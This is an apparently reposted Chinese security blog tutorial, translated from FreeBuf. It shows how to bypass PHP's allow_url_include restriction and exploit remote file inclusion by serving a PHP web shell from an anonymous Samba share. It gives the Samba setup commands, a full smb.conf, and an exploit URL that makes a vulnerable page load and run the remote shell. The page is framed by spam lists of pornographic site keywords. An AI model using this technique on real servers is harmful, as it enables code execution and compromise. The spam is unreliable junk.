日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程语言 > php >内容正文

php

php远程文件包含攻击,利用SMB共享来绕过php远程文件包含的限制

發(fā)布時(shí)間:2024/4/20 php 55 豆豆
生活随笔 收集整理的這篇文章主要介紹了 php远程文件包含攻击,利用SMB共享来绕过php远程文件包含的限制 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

在這篇博文中,我將為大家演示如何利用PHP應(yīng)用中的遠(yuǎn)程文件包含漏洞的技術(shù)。我們將繞過php遠(yuǎn)程文件包含的限制,并執(zhí)行RFI的利用,即使PHP環(huán)境被配置為不包含來自遠(yuǎn)程HTTP/FTP URL的文件。

PHP 和 SMB 共享文件訪問

在PHP配置文件中,“allow_url_include”wrapper默認(rèn)設(shè)置為“Off”,指示PHP不加載遠(yuǎn)程HTTP或FTP URL,從而防止遠(yuǎn)程文件包含攻擊。但是,即使“allow_url_include”和“allow_url_fopen”都設(shè)置為“Off”,PHP也不會(huì)阻止加載SMB URL。而這就極有可能被濫用來從SMB共享加載遠(yuǎn)程托管的PHP Web shell。

攻擊場景概述

當(dāng)易受攻擊的PHP應(yīng)用程序代碼嘗試從受攻擊者控制的SMB共享加載PHP Web shell時(shí),SMB共享應(yīng)允許訪問該文件。攻擊者需要在其上配置具有匿名瀏覽訪問權(quán)限的SMB服務(wù)器。因此,一旦易受攻擊的應(yīng)用程序嘗試從SMB共享訪問PHP Web shell,SMB服務(wù)器將不會(huì)要求任何的憑據(jù),易受攻擊的應(yīng)用程序?qū)琖eb shell的PHP代碼。

首先,我重新配置了PHP環(huán)境,并在php.in i文件中禁用了“allow-url-fopen”和“allow-url-include”。之后,配置了具有匿名瀏覽訪問的SMB服務(wù)器。一旦SMB共享準(zhǔn)備就緒,我們就可以利用易受攻擊的應(yīng)用程序了。

PHP 環(huán)境設(shè)置

將托管易受攻擊代碼的機(jī)器上的“allow_url_fopen”和“allow_url_include”設(shè)置為“Off”

以下是版本為“5.5.11”的PHP當(dāng)前配置截圖:

在繼續(xù)下一步之前,讓我們確保當(dāng)我們嘗試訪問HTTP上托管的Web shell時(shí),PHP代碼不允許遠(yuǎn)程文件包含。

可以看到,當(dāng)我試圖從遠(yuǎn)程主機(jī)包含PHP Web shell時(shí),應(yīng)用程序拋出錯(cuò)誤并且沒有包含遠(yuǎn)程文件。

使用匿名瀏覽訪問配置 Samba 服務(wù)器(Linux 機(jī)器)

使用以下命令安裝Samba服務(wù)器:apt-get install samba

創(chuàng)建SMB共享目錄:mkdir /var/www/html/pub/

配置新創(chuàng)建的SMB共享目錄的權(quán)限:chmod 0555 /var/www/html/pub/

chown -R nobody:nogroup /var/www/html/pub/

運(yùn)行以下命令,刪除SAMBA服務(wù)器配置文件的默認(rèn)內(nèi)容。echo > /etc/samba/smb.conf

將以下內(nèi)容添加到/etc/samba/smb.conf文件。[global]

workgroup = WORKGROUP

server string = Samba Server %v

netbios name = indishell-lab

security = user

map to guest = bad user

name resolve order = bcast host

dns proxy = no

bind interfaces only = yes

[ica]

path = /var/www/html/pub

writable = no

guest ok = yes

guest only = yes

read only = yes

directory mode = 0555

force user = nobody

現(xiàn)在,重啟SAMBA服務(wù)器以使配置文件/etc/samba/smb.conf中的新配置生效。service smbd restart

成功重啟SAMBA服務(wù)器后,嘗試訪問SMB共享并確保SAMBA服務(wù)器不要求提供憑據(jù)。

在本例中,SAMBA服務(wù)器IP為192.168.0.3,我需要訪問Windows文件瀏覽器中的SMB共享,如下:\\192.168.0.3\

在 SMB 共享中托管 PHP Web shell

太棒了!可以訪問smb共享,并顯示目錄“ica”存在。

現(xiàn)在,將PHP shell托管在目錄“/var/www/html/pub”中,該目錄為smb共享目錄“ica”。

成功托管PHP shell后,我們使用Windows文件瀏覽器訪問SMB共享目錄“ica”。\\192.168.0.3\ica\

可以看到php shell存在于smb共享目錄中,在本例中為box.php文件。

利用文件包含易受攻擊的參數(shù)

讓我們使用這個(gè)PHP shell SMB鏈接,以及易受攻擊的php代碼瀏覽它。http://vulnerable_application/page.php?page=\\192.168.0.3\ica\box.php

PHP易受攻擊的代碼從SMB共享中獲取了web shell,并在應(yīng)用程序服務(wù)器上執(zhí)行了代碼\m/。我們已經(jīng)繞過了php遠(yuǎn)程文件包含的限制,并包含了托管在遠(yuǎn)程主機(jī)上的Web shell。

,FB小編secist編譯,轉(zhuǎn)載請注明來自FreeBuf.COM

總結(jié)

以上是生活随笔為你收集整理的php远程文件包含攻击,利用SMB共享来绕过php远程文件包含的限制的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 日韩激情| 色交视频 | 中文字幕视频 | 逼特逼视频在线观看 | 久久伊人中文字幕 | www.蜜臀 | 日本一区二区三区网站 | 亚洲不卡在线观看 | 国产黑丝av| 国产精品777777 | 欧美日韩性 | 激情xxxx | 一区二区三区在线观看免费 | 欧美日韩人妻精品一区二区三区 | 天天精品 | 日韩视频中文 | 国产毛片视频 | 成人免费在线网站 | 91偷拍富婆spa盗摄在线 | 中文字幕免费在线看线人动作大片 | 非洲黑人狂躁日本妞 | 国产午夜免费福利 | 中文字幕亚洲激情 | 中文字幕第66页 | 99精品国产成人一区二区 | 精品亚洲天堂 | 毛片基地站 | 日本精品一区二区在线观看 | 青青艹视频 | 黄色高清视频 | 亚洲综合在线中文字幕 | 3d动漫精品啪啪一区二区三区免费 | 九草网 | 香蕉人妻av久久久久天天 | 青青成人在线 | 亚洲男女激情 | 亚洲yy | av中文在线播放 | 一区二区国产欧美 | 精品动漫一区二区 | 可以在线观看av的网站 | 婷婷俺去也| 欧日韩不卡在线视频 | 亚洲色图吧 | 爱爱爱爱网站 | 国产精品无码专区 | 日本一区二区不卡在线观看 | 免费在线看黄网站 | 激情五月色播五月 | 国产精品精品国产色婷婷 | 超碰v| 天天插视频 | 人妻熟人中文字幕一区二区 | 午夜爱爱影院 | 一级伦理农村妇女愉情 | 亚洲奶水xxxx哺乳期 | 老汉av| 福利网址在线 | 日本大胆欧美人术艺术 | xx99小雪| 欧洲久久久久久 | 国产精品视频一区二区三区 | 国产亚洲精品美女久久久久 | 亚洲精品97久久中文字幕 | 一区二区福利 | 中文字幕日韩经典 | 黄色免费在线看 | 精品久久福利 | 欧美大黑b | av尤物在线 | 亚洲视频在线观看一区二区三区 | 精品久久久久久久久久久久久久久久 | 亚洲成人网页 | www.com色| 五月婷婷俺也去 | 密乳av| 久草福利在线 | 日韩欧美中文字幕在线观看 | 亚洲黄网站在线观看 | 亚洲欧美成人一区二区三区 | 老司机深夜免费福利 | 国产美女喷水 | 亚洲一区二区久久 | 97超碰在线资源 | 亚洲伦理一区二区 | 国产一卡二卡三卡四卡 | 懂色av一区二区三区 | 午夜国产福利在线观看 | 天堂综合网久久 | 亚洲精品一区二 | 中文字幕乱码亚洲精品一区 | 大吊一区二区三区 | www.一区二区三区 | 男女超爽视频免费播放 | 日本福利在线观看 | 日韩精品123 | 亚洲欧洲中文字幕 | 亚洲国产精品av | 天天干天天操天天舔 |